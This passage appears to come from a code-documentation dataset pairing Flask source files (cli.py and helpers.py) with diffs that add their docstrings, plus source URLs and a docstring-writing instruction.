"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@click.option(
"--exclude-patterns",
default=None,
type=SeparatedPathType(),
help=(
"Files matching these fnmatch patterns will not trigger a reload"
" on change. Multiple patterns are separated by"
f" {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info: ScriptInfo,
host: str,
port: int,
reload: bool,
debugger: bool,
with_threads: bool,
cert: ssl.SSLContext | tuple[str, str | None] | t.Literal["adhoc"] | None,
extra_files: list[str] | None,
exclude_patterns: list[str] | None,
) -> None:
try:
app: WSGIApplication = info.load_app() # pyright: ignore
except Exception as e:
if is_running_from_reloader():
# When reloading, print out the error immediately, but raise
# it later so the debugger or server can handle it.
traceback.print_exc()
err = e
def app(
environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
raise err from None
else:
# When not reloading, raise the error immediately so the
# command fails.
raise e from None
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(debug, info.app_import_path)
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
exclude_patterns=exclude_patterns,
)
run_command.params.insert(0, _debug_option)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
import code
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {current_app.import_name}\n"
f"Instance: {current_app.instance_path}"
)
ctx: dict[str, t.Any] = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(current_app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "domain", "rule", "match")),
default="endpoint",
help=(
"Method to sort routes by. 'match' is the order that Flask will match routes"
" when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"}
host_matching = current_app.url_map.host_matching
has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules)
rows = []
for rule in rules:
row = [
rule.endpoint,
", ".join(sorted((rule.methods or set()) - ignored_methods)),
]
if has_domain:
row.append((rule.host if host_matching else rule.subdomain) or "")
row.append(rule.rule)
rows.append(row)
headers = ["Endpoint", "Methods"]
sorts = ["endpoint", "methods"]
if has_domain:
headers.append("Host" if host_matching else "Subdomain")
sorts.append("domain")
headers.append("Rule")
sorts.append("rule")
try:
rows.sort(key=itemgetter(sorts.index(sort)))
except ValueError:
pass
rows.insert(0, headers)
widths = [max(len(row[i]) for row in rows) for i in range(len(headers))]
rows.insert(1, ["-" * w for w in widths])
template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths))
for row in rows:
click.echo(template.format(*row))
cli = FlaskGroup(
name="flask",
help="""\
A general utility script for Flask applications.
An application to load must be given with the '--app' option,
'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file
in the current directory.
""",
)
def main() -> None:
cli.main()
if __name__ == "__main__":
main() | --- +++ @@ -35,9 +35,13 @@
class NoAppException(click.UsageError):
+ """Raised if an application cannot be found or loaded."""
def find_best_app(module: ModuleType) -> Flask:
+ """Given a module instance this tries to find the best possible
+ application in the module or raises an exception.
+ """
from . import Flask
# Search for the most common names first.
@@ -88,6 +92,13 @@
def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool:
+ """Check whether calling a function raised a ``TypeError`` because
+ the call failed or because something in the factory raised the
+ error.
+
+ :param f: The function that was called.
+ :return: ``True`` if the call failed.
+ """
tb = sys.exc_info()[2]
try:
@@ -107,6 +118,9 @@
def find_app_by_string(module: ModuleType, app_name: str) -> Flask:
+ """Check if the given string is a variable name or a function. Call
+ a function to get the app instance, or return the variable directly.
+ """
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
@@ -184,6 +198,9 @@
def prepare_import(path: str) -> str:
+ """Given a filename this will try to calculate the python path, add it
+ to the search path and return the actual module name that is expected.
+ """
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
@@ -274,6 +291,16 @@
class ScriptInfo:
+ """Helper object to deal with Flask applications. This is usually not
+ necessary to interface with as it's used internally in the dispatching
+ to click. In future versions of Flask this object will most likely play
+ a bigger role. Typically it's created automatically by the
+ :class:`FlaskGroup` but you can also manually create it and pass it
+ onwards as click object.
+
+ .. versionchanged:: 3.1
+ Added the ``load_dotenv_defaults`` parameter and attribute.
+ """
def __init__(
self,
@@ -304,6 +331,10 @@ self._loaded_app: Flask | None = None
def load_app(self) -> Flask:
+ """Loads the Flask app (if not yet loaded) and returns it. Calling
+ this multiple times will just result in the already loaded app to
+ be returned.
+ """
if self._loaded_app is not None:
return self._loaded_app
app: Flask | None = None
@@ -347,6 +378,18 @@
def with_appcontext(f: F) -> F:
+ """Wraps a callback so that it's guaranteed to be executed with the
+ script's application context.
+
+ Custom commands (and their options) registered under ``app.cli`` or
+ ``blueprint.cli`` will always have an app context available, this
+ decorator is not required in that case.
+
+ .. versionchanged:: 2.2
+ The app context is active for subcommands as well as the
+ decorated callback. The app context is always available to
+ ``app.cli`` command and parameter callbacks.
+ """
@click.pass_context
def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any:
@@ -360,10 +403,20 @@
class AppGroup(click.Group):
+ """This works similar to a regular click :class:`~click.Group` but it
+ changes the behavior of the :meth:`command` decorator so that it
+ automatically wraps the functions in :func:`with_appcontext`.
+
+ Not to be confused with :class:`FlaskGroup`.
+ """
def command( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Command]:
+ """This works exactly like the method of the same name on a regular
+ :class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
+ unless it's disabled by passing ``with_appcontext=False``.
+ """
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f: t.Callable[..., t.Any]) -> click.Command:
@@ -376,6 +429,10 @@ def group( # type: ignore[override]
self, *args: t.Any, **kwargs: t.Any
) -> t.Callable[[t.Callable[..., t.Any]], click.Group]:
+ """This works exactly like the method of the same name on a regular
+ :class:`click.Group` but it defaults the group class to
+ :class:`AppGroup`.
+ """
kwargs.setdefault("cls", AppGroup)
return super().group(*args, **kwargs) # type: ignore[no-any-return]
@@ -472,6 +529,36 @@
class FlaskGroup(AppGroup):
+ """Special subclass of the :class:`AppGroup` group that supports
+ loading more commands from the configured Flask app. Normally a
+ developer does not have to interface with this class but there are
+ some very advanced use cases for which it makes sense to create an
+ instance of this. see :ref:`custom-scripts`.
+
+ :param add_default_commands: if this is True then the default run and
+ shell commands will be added.
+ :param add_version_option: adds the ``--version`` option.
+ :param create_app: an optional callback that is passed the script info and
+ returns the loaded app.
+ :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
+ files to set environment variables. Will also change the working
+ directory to the directory containing the first file found.
+ :param set_debug_flag: Set the app's debug flag.
+
+ .. versionchanged:: 3.1
+ ``-e path`` takes precedence over default ``.env`` and ``.flaskenv`` files.
+
+ .. versionchanged:: 2.2
+ Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options.
+
+ .. versionchanged:: 2.2
+ An app context is pushed when running ``app.cli`` commands, so
+ ``@with_appcontext`` is no longer required for those commands.
+
+ .. versionchanged:: 1.0
+ If installed, python-dotenv will be used to load environment variables
+ from :file:`.env` and :file:`.flaskenv` files.
+ """
def __init__(
self,
@@ -602,12 +689,46 @@
def _path_is_ancestor(path: str, other: str) -> bool:
+ """Take ``other`` and remove the length of ``path`` from it. Then join it
+ to ``path``. If it is the original value, ``path`` is an ancestor of
+ ``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(
path: str | os.PathLike[str] | None = None, load_defaults: bool = True
) -> bool:
+ """Load "dotenv" files to set environment variables. A given path takes
+ precedence over ``.env``, which takes precedence over ``.flaskenv``. After
+ loading and combining these files, values are only set if the key is not
+ already set in ``os.environ``.
+
+ This is a no-op if `python-dotenv`_ is not installed.
+
+ .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
+
+ :param path: Load the file at this location.
+ :param load_defaults: Search for and load the default ``.flaskenv`` and
+ ``.env`` files.
+ :return: ``True`` if at least one env var was loaded.
+
+ .. versionchanged:: 3.1
+ Added the ``load_defaults`` parameter. A given path takes precedence
+ over default files.
+
+ .. versionchanged:: 2.0
+ The current directory is not changed to the location of the
+ loaded file.
+
+ .. versionchanged:: 2.0
+ When loading the env files, set the default encoding to UTF-8.
+
+ .. versionchanged:: 1.1.0
+ Returns ``False`` when python-dotenv is not installed, or when
+ the given path isn't a file.
+
+ .. versionadded:: 1.0
+ """
try:
import dotenv
except ImportError:
@@ -643,6 +764,9 @@
def show_server_banner(debug: bool, app_import_path: str | None) -> None:
+ """Show extra startup messages the first time the server is run,
+ ignoring the reloader.
+ """
if is_running_from_reloader():
return
@@ -654,6 +778,10 @@
class CertParamType(click.ParamType):
+ """Click option type for the ``--cert`` option. Allows either an
+ existing file, the string ``'adhoc'``, or an import for a
+ :class:`~ssl.SSLContext` object.
+ """
name = "path"
@@ -698,6 +826,9 @@
def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
+ """The ``--key`` option must be specified when ``--cert`` is a file.
+ Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
+ """
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
@@ -734,6 +865,10 @@
class SeparatedPathType(click.Path):
+ """Click option type that accepts a list of values separated by the
+ OS's path separator (``:``, ``;`` on Windows). Each value is
+ validated as a :class:`click.Path` type.
+ """
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
@@ -808,6 +943,14 @@ extra_files: list[str] | None,
exclude_patterns: list[str] | None,
) -> None:
+ """Run a local development server.
+
+ This server is for development purposes only. It does not provide
+ the stability, security, or performance of production WSGI servers.
+
+ The reloader and debugger are enabled by default with the '--debug'
+ option.
+ """
try:
app: WSGIApplication = info.load_app() # pyright: ignore
except Exception as e:
@@ -856,6 +999,13 @@ @click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
+ """Run an interactive Python shell in the context of a given
+ Flask application. The application will populate the default
+ namespace of this shell according to its configuration.
+
+ This is useful for executing small snippets of management code
+ without having to manually configure the application.
+ """
import code
banner = (
@@ -909,6 +1059,7 @@ @click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
+ """Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
@@ -973,4 +1124,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/cli.py |
Include argument descriptions in docstrings | from __future__ import annotations
import importlib.util
import os
import sys
import typing as t
from datetime import datetime
from functools import cache
from functools import update_wrapper
from types import TracebackType
import werkzeug.utils
from werkzeug.exceptions import abort as _wz_abort
from werkzeug.utils import redirect as _wz_redirect
from werkzeug.wrappers import Response as BaseResponse
from .globals import _cv_app
from .globals import app_ctx
from .globals import current_app
from .globals import request
from .globals import session
from .signals import message_flashed
if t.TYPE_CHECKING: # pragma: no cover
from .wrappers import Response
def get_debug_flag() -> bool:
val = os.environ.get("FLASK_DEBUG")
return bool(val and val.lower() not in {"0", "false", "no"})
def get_load_dotenv(default: bool = True) -> bool:
val = os.environ.get("FLASK_SKIP_DOTENV")
if not val:
return default
return val.lower() in ("0", "false", "no")
@t.overload
def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr],
) -> t.Iterator[t.AnyStr]: ...
@t.overload
def stream_with_context(
generator_or_function: t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: ...
def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]:
try:
gen = iter(generator_or_function) # type: ignore[arg-type]
except TypeError:
def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any:
gen = generator_or_function(*args, **kwargs) # type: ignore[operator]
return stream_with_context(gen)
return update_wrapper(decorator, generator_or_function) # type: ignore[arg-type]
def generator() -> t.Iterator[t.AnyStr]:
if (ctx := _cv_app.get(None)) is None:
raise RuntimeError(
"'stream_with_context' can only be used when a request"
" context is active, such as in a view function."
)
with ctx:
yield None # type: ignore[misc]
try:
yield from gen
finally:
# Clean up in case the user wrapped a WSGI iterator.
if hasattr(gen, "close"):
gen.close()
# Execute the generator to the sentinel value. This captures the current
# context and pushes it to preserve it. Further iteration will yield from
# the original iterator.
wrapped_g = generator()
next(wrapped_g)
return wrapped_g
def make_response(*args: t.Any) -> Response:
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def url_for(
endpoint: str,
*,
_anchor: str | None = None,
_method: str | None = None,
_scheme: str | None = None,
_external: bool | None = None,
**values: t.Any,
) -> str:
return current_app.url_for(
endpoint,
_anchor=_anchor,
_method=_method,
_scheme=_scheme,
_external=_external,
**values,
)
def redirect(
location: str, code: int = 303, Response: type[BaseResponse] | None = None
) -> BaseResponse:
if (ctx := _cv_app.get(None)) is not None:
return ctx.app.redirect(location, code=code)
return _wz_redirect(location, code=code, Response=Response)
def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
if (ctx := _cv_app.get(None)) is not None:
ctx.app.aborter(code, *args, **kwargs)
_wz_abort(code, *args, **kwargs)
def get_template_attribute(template_name: str, attribute: str) -> t.Any:
return getattr(current_app.jinja_env.get_template(template_name).module, attribute)
def flash(message: str, category: str = "message") -> None:
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
#
# This assumed that changes made to mutable structures in the session are
# always in sync with the session object, which is not true for session
# implementations that use external storage for keeping their keys/values.
flashes = session.get("_flashes", [])
flashes.append((category, message))
session["_flashes"] = flashes
app = current_app._get_current_object()
message_flashed.send(
app,
_async_wrapper=app.ensure_sync,
message=message,
category=category,
)
def get_flashed_messages(
with_categories: bool = False, category_filter: t.Iterable[str] = ()
) -> list[str] | list[tuple[str, str]]:
flashes = app_ctx._flashes
if flashes is None:
flashes = session.pop("_flashes") if "_flashes" in session else []
app_ctx._flashes = flashes
if category_filter:
flashes = list(filter(lambda f: f[0] in category_filter, flashes))
if not with_categories:
return [x[1] for x in flashes]
return flashes
def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]:
ctx = app_ctx._get_current_object()
if kwargs.get("max_age") is None:
kwargs["max_age"] = ctx.app.get_send_file_max_age
kwargs.update(
environ=ctx.request.environ,
use_x_sendfile=ctx.app.config["USE_X_SENDFILE"],
response_class=ctx.app.response_class,
_root_path=ctx.app.root_path,
)
return kwargs
def send_file(
path_or_file: os.PathLike[t.AnyStr] | str | t.IO[bytes],
mimetype: str | None = None,
as_attachment: bool = False,
download_name: str | None = None,
conditional: bool = True,
etag: bool | str = True,
last_modified: datetime | int | float | None = None,
max_age: None | (int | t.Callable[[str | None], int | None]) = None,
) -> Response:
return werkzeug.utils.send_file( # type: ignore[return-value]
**_prepare_send_file_kwargs(
path_or_file=path_or_file,
environ=request.environ,
mimetype=mimetype,
as_attachment=as_attachment,
download_name=download_name,
conditional=conditional,
etag=etag,
last_modified=last_modified,
max_age=max_age,
)
)
def send_from_directory(
directory: os.PathLike[str] | str,
path: os.PathLike[str] | str,
**kwargs: t.Any,
) -> Response:
return werkzeug.utils.send_from_directory( # type: ignore[return-value]
directory, path, **_prepare_send_file_kwargs(**kwargs)
)
def get_root_path(import_name: str) -> str:
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None:
return os.path.dirname(os.path.abspath(mod.__file__))
# Next attempt: check the loader.
try:
spec = importlib.util.find_spec(import_name)
if spec is None:
raise ValueError
except (ImportError, ValueError):
loader = None
else:
loader = spec.loader
# Loader does not exist or we're referring to an unloaded main
# module or a main module without path (interactive sessions), go
# with the current working directory.
if loader is None:
return os.getcwd()
if hasattr(loader, "get_filename"):
filepath = loader.get_filename(import_name) # pyright: ignore
else:
# Fall back to imports.
__import__(import_name)
mod = sys.modules[import_name]
filepath = getattr(mod, "__file__", None)
# If we don't have a file path it might be because it is a
# namespace package. In this case pick the root path from the
# first module that is contained in the package.
if filepath is None:
raise RuntimeError(
"No root path can be found for the provided module"
f" {import_name!r}. This can happen because the module"
" came from an import hook that does not provide file"
" name information or because it's a namespace package."
" In this case the root path needs to be explicitly"
" provided."
)
# filepath is import_name.py for a module, or __init__.py for a package.
return os.path.dirname(os.path.abspath(filepath)) # type: ignore[no-any-return]
@cache
def _split_blueprint_path(name: str) -> list[str]:
out: list[str] = [name]
if "." in name:
out.extend(_split_blueprint_path(name.rpartition(".")[0]))
return out
class _CollectErrors:
def __init__(self) -> None:
self.errors: list[BaseException] = []
def __enter__(self) -> None:
pass
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_val: BaseException | None,
exc_tb: TracebackType | None,
) -> bool:
if exc_val is not None:
self.errors.append(exc_val)
return True
def raise_any(self, message: str) -> None:
if self.errors:
if sys.version_info >= (3, 11):
raise BaseExceptionGroup(message, self.errors) # noqa: F821
else:
raise self.errors[0] | --- +++ @@ -26,11 +26,20 @@
def get_debug_flag() -> bool:
+ """Get whether debug mode should be enabled for the app, indicated by the
+ :envvar:`FLASK_DEBUG` environment variable. The default is ``False``.
+ """
val = os.environ.get("FLASK_DEBUG")
return bool(val and val.lower() not in {"0", "false", "no"})
def get_load_dotenv(default: bool = True) -> bool:
+ """Get whether the user has disabled loading default dotenv files by
+ setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load
+ the files.
+
+ :param default: What to return if the env var isn't set.
+ """
val = os.environ.get("FLASK_SKIP_DOTENV")
if not val:
@@ -54,6 +63,56 @@ def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]:
+ """Wrap a response generator function so that it runs inside the current
+ request context. This keeps :data:`.request`, :data:`.session`, and :data:`.g`
+ available, even though at the point the generator runs the request context
+ will typically have ended.
+
+ .. warning::
+
+ Due to the following caveat, it is often safer to pass the data you
+ need as arguments to the generator, rather than relying on the context
+ objects.
+
+ More headers cannot be sent after the body has begun. Therefore, you must
+ make sure all headers are set before starting the response. In particular,
+ if the generator will access ``session``, be sure to do so in the view as
+ well so that the ``Vary: cookie`` header will be set. Do not modify the
+ session in the generator, as the ``Set-Cookie`` header will already be sent.
+
+ Use it as a decorator on a generator function:
+
+ .. code-block:: python
+
+ from flask import stream_with_context, request, Response
+
+ @app.get("/stream")
+ def streamed_response():
+ @stream_with_context
+ def generate():
+ yield "Hello "
+ yield request.args["name"]
+ yield "!"
+
+ return Response(generate())
+
+ Or use it as a wrapper around a created generator:
+
+ .. code-block:: python
+
+ from flask import stream_with_context, request, Response
+
+ @app.get("/stream")
+ def streamed_response():
+ def generate():
+ yield "Hello "
+ yield request.args["name"]
+ yield "!"
+
+ return Response(stream_with_context(generate()))
+
+ .. versionadded:: 0.9
+ """
try:
gen = iter(generator_or_function) # type: ignore[arg-type]
except TypeError:
@@ -90,6 +149,47 @@
def make_response(*args: t.Any) -> Response:
+ """Sometimes it is necessary to set additional headers in a view. Because
+ views do not have to return response objects but can return a value that
+ is converted into a response object by Flask itself, it becomes tricky to
+ add headers to it. This function can be called instead of using a return
+ and you will get a response object which you can use to attach headers.
+
+ If view looked like this and you want to add a new header::
+
+ def index():
+ return render_template('index.html', foo=42)
+
+ You can now do something like this::
+
+ def index():
+ response = make_response(render_template('index.html', foo=42))
+ response.headers['X-Parachutes'] = 'parachutes are cool'
+ return response
+
+ This function accepts the very same arguments you can return from a
+ view function. This for example creates a response with a 404 error
+ code::
+
+ response = make_response(render_template('not_found.html'), 404)
+
+ The other use case of this function is to force the return value of a
+ view function into a response which is helpful with view
+ decorators::
+
+ response = make_response(view_function())
+ response.headers['X-Parachutes'] = 'parachutes are cool'
+
+ Internally this function does the following things:
+
+ - if no arguments are passed, it creates a new response argument
+ - if one argument is passed, :meth:`flask.Flask.make_response`
+ is invoked with it.
+ - if more than one argument is passed, the arguments are passed
+ to the :meth:`flask.Flask.make_response` function as tuple.
+
+ .. versionadded:: 0.6
+ """
if not args:
return current_app.response_class()
if len(args) == 1:
@@ -106,6 +206,41 @@ _external: bool | None = None,
**values: t.Any,
) -> str:
+ """Generate a URL to the given endpoint with the given values.
+
+ This requires an active request or application context, and calls
+ :meth:`current_app.url_for() <flask.Flask.url_for>`. See that method
+ for full documentation.
+
+ :param endpoint: The endpoint name associated with the URL to
+ generate. If this starts with a ``.``, the current blueprint
+ name (if any) will be used.
+ :param _anchor: If given, append this as ``#anchor`` to the URL.
+ :param _method: If given, generate the URL associated with this
+ method for the endpoint.
+ :param _scheme: If given, the URL will have this scheme if it is
+ external.
+ :param _external: If given, prefer the URL to be internal (False) or
+ require it to be external (True). External URLs include the
+ scheme and domain. When not in an active request, URLs are
+ external by default.
+ :param values: Values to use for the variable parts of the URL rule.
+ Unknown keys are appended as query string arguments, like
+ ``?a=b&c=d``.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.url_for``, allowing an app to override the
+ behavior.
+
+ .. versionchanged:: 0.10
+ The ``_scheme`` parameter was added.
+
+ .. versionchanged:: 0.9
+ The ``_anchor`` and ``_method`` parameters were added.
+
+ .. versionchanged:: 0.9
+ Calls ``app.handle_url_build_error`` on build errors.
+ """
return current_app.url_for(
endpoint,
_anchor=_anchor,
@@ -119,6 +254,24 @@ def redirect(
location: str, code: int = 303, Response: type[BaseResponse] | None = None
) -> BaseResponse:
+ """Create a redirect response object.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`~flask.Flask.redirect` method, otherwise it will use
+ :func:`werkzeug.utils.redirect`.
+
+ :param location: The URL to redirect to.
+ :param code: The status code for the redirect.
+ :param Response: The response class to use. Not used when
+ ``current_app`` is active, which uses ``app.response_class``.
+
+ .. versionchanged:: 3.2
+ ``code`` defaults to ``303`` instead of ``302``.
+
+ .. versionadded:: 2.2
+ Calls ``current_app.redirect`` if available instead of always
+ using Werkzeug's default ``redirect``.
+ """
if (ctx := _cv_app.get(None)) is not None:
return ctx.app.redirect(location, code=code)
@@ -126,6 +279,22 @@
def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
+ """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given
+ status code.
+
+ If :data:`~flask.current_app` is available, it will call its
+ :attr:`~flask.Flask.aborter` object, otherwise it will use
+ :func:`werkzeug.exceptions.abort`.
+
+ :param code: The status code for the exception, which must be
+ registered in ``app.aborter``.
+ :param args: Passed to the exception.
+ :param kwargs: Passed to the exception.
+
+ .. versionadded:: 2.2
+ Calls ``current_app.aborter`` if available instead of always
+ using Werkzeug's default ``abort``.
+ """
if (ctx := _cv_app.get(None)) is not None:
ctx.app.aborter(code, *args, **kwargs)
@@ -133,10 +302,42 @@
def get_template_attribute(template_name: str, attribute: str) -> t.Any:
+ """Loads a macro (or variable) a template exports. This can be used to
+ invoke a macro from within Python code. If you for example have a
+ template named :file:`_cider.html` with the following contents:
+
+ .. sourcecode:: html+jinja
+
+ {% macro hello(name) %}Hello {{ name }}!{% endmacro %}
+
+ You can access this from Python code like this::
+
+ hello = get_template_attribute('_cider.html', 'hello')
+ return hello('World')
+
+ .. versionadded:: 0.2
+
+ :param template_name: the name of the template
+ :param attribute: the name of the variable of macro to access
+ """
return getattr(current_app.jinja_env.get_template(template_name).module, attribute)
def flash(message: str, category: str = "message") -> None:
+ """Flashes a message to the next request. In order to remove the
+ flashed message from the session and to display it to the user,
+ the template has to call :func:`get_flashed_messages`.
+
+ .. versionchanged:: 0.3
+ `category` parameter added.
+
+ :param message: the message to be flashed.
+ :param category: the category for the message. The following values
+ are recommended: ``'message'`` for any kind of message,
+ ``'error'`` for errors, ``'info'`` for information
+ messages and ``'warning'`` for warnings. However any
+ kind of string can be used as category.
+ """
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
@@ -159,6 +360,34 @@ def get_flashed_messages(
with_categories: bool = False, category_filter: t.Iterable[str] = ()
) -> list[str] | list[tuple[str, str]]:
+ """Pulls all flashed messages from the session and returns them.
+ Further calls in the same request to the function will return
+ the same messages. By default just the messages are returned,
+ but when `with_categories` is set to ``True``, the return value will
+ be a list of tuples in the form ``(category, message)`` instead.
+
+ Filter the flashed messages to one or more categories by providing those
+ categories in `category_filter`. This allows rendering categories in
+ separate html blocks. The `with_categories` and `category_filter`
+ arguments are distinct:
+
+ * `with_categories` controls whether categories are returned with message
+ text (``True`` gives a tuple, where ``False`` gives just the message text).
+ * `category_filter` filters the messages down to only those matching the
+ provided categories.
+
+ See :doc:`/patterns/flashing` for examples.
+
+ .. versionchanged:: 0.3
+ `with_categories` parameter added.
+
+ .. versionchanged:: 0.9
+ `category_filter` parameter added.
+
+ :param with_categories: set to ``True`` to also receive categories.
+ :param category_filter: filter of categories to limit return values. Only
+ categories in the list will be returned.
+ """
flashes = app_ctx._flashes
if flashes is None:
flashes = session.pop("_flashes") if "_flashes" in session else []
@@ -195,6 +424,107 @@ last_modified: datetime | int | float | None = None,
max_age: None | (int | t.Callable[[str | None], int | None]) = None,
) -> Response:
+ """Send the contents of a file to the client.
+
+ The first argument can be a file path or a file-like object. Paths
+ are preferred in most cases because Werkzeug can manage the file and
+ get extra information from the path. Passing a file-like object
+ requires that the file is opened in binary mode, and is mostly
+ useful when building a file in memory with :class:`io.BytesIO`.
+
+ Never pass file paths provided by a user. The path is assumed to be
+ trusted, so a user could craft a path to access a file you didn't
+ intend. Use :func:`send_from_directory` to safely serve
+ user-requested paths from within a directory.
+
+ If the WSGI server sets a ``file_wrapper`` in ``environ``, it is
+ used, otherwise Werkzeug's built-in wrapper is used. Alternatively,
+ if the HTTP server supports ``X-Sendfile``, configuring Flask with
+ ``USE_X_SENDFILE = True`` will tell the server to send the given
+ path, which is much more efficient than reading it in Python.
+
+ :param path_or_file: The path to the file to send, relative to the
+ current working directory if a relative path is given.
+ Alternatively, a file-like object opened in binary mode. Make
+ sure the file pointer is seeked to the start of the data.
+ :param mimetype: The MIME type to send for the file. If not
+ provided, it will try to detect it from the file name.
+ :param as_attachment: Indicate to a browser that it should offer to
+ save the file instead of displaying it.
+ :param download_name: The default name browsers will use when saving
+ the file. Defaults to the passed file name.
+ :param conditional: Enable conditional and range responses based on
+ request headers. Requires passing a file path and ``environ``.
+ :param etag: Calculate an ETag for the file, which requires passing
+ a file path. Can also be a string to use instead.
+ :param last_modified: The last modified time to send for the file,
+ in seconds. If not provided, it will try to detect it from the
+ file path.
+ :param max_age: How long the client should cache the file, in
+ seconds. If set, ``Cache-Control`` will be ``public``, otherwise
+ it will be ``no-cache`` to prefer conditional caching.
+
+ .. versionchanged:: 2.0
+ ``download_name`` replaces the ``attachment_filename``
+ parameter. If ``as_attachment=False``, it is passed with
+ ``Content-Disposition: inline`` instead.
+
+ .. versionchanged:: 2.0
+ ``max_age`` replaces the ``cache_timeout`` parameter.
+ ``conditional`` is enabled and ``max_age`` is not set by
+ default.
+
+ .. versionchanged:: 2.0
+ ``etag`` replaces the ``add_etags`` parameter. It can be a
+ string to use instead of generating one.
+
+ .. versionchanged:: 2.0
+ Passing a file-like object that inherits from
+ :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather
+ than sending an empty file.
+
+ .. versionadded:: 2.0
+ Moved the implementation to Werkzeug. This is now a wrapper to
+ pass some Flask-specific arguments.
+
+ .. versionchanged:: 1.1
+ ``filename`` may be a :class:`~os.PathLike` object.
+
+ .. versionchanged:: 1.1
+ Passing a :class:`~io.BytesIO` object supports range requests.
+
+ .. versionchanged:: 1.0.3
+ Filenames are encoded with ASCII instead of Latin-1 for broader
+ compatibility with WSGI servers.
+
+ .. versionchanged:: 1.0
+ UTF-8 filenames as specified in :rfc:`2231` are supported.
+
+ .. versionchanged:: 0.12
+ The filename is no longer automatically inferred from file
+ objects. If you want to use automatic MIME and etag support,
+ pass a filename via ``filename_or_fp`` or
+ ``attachment_filename``.
+
+ .. versionchanged:: 0.12
+ ``attachment_filename`` is preferred over ``filename`` for MIME
+ detection.
+
+ .. versionchanged:: 0.9
+ ``cache_timeout`` defaults to
+ :meth:`Flask.get_send_file_max_age`.
+
+ .. versionchanged:: 0.7
+ MIME guessing and etag support for file-like objects was
+ removed because it was unreliable. Pass a filename if you are
